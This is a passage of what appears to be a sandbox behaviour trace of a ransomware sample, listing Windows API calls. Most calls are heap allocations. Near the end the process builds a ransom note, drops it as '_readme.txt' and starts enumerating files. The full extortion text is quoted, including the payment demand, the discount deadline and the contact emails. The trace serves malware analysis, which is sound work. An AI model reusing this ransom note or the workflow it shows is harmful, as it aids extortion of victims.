(HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.061] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0184.061] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.061] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.062] PathFindFileNameW (pszPath="") returned="" [0184.062] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.062] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.062] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.062] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.063] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0184.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.063] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0184.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.064] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.064] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.065] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.066] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*" (normalized: "c:\\boot\\it-it\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.067] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.067] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, 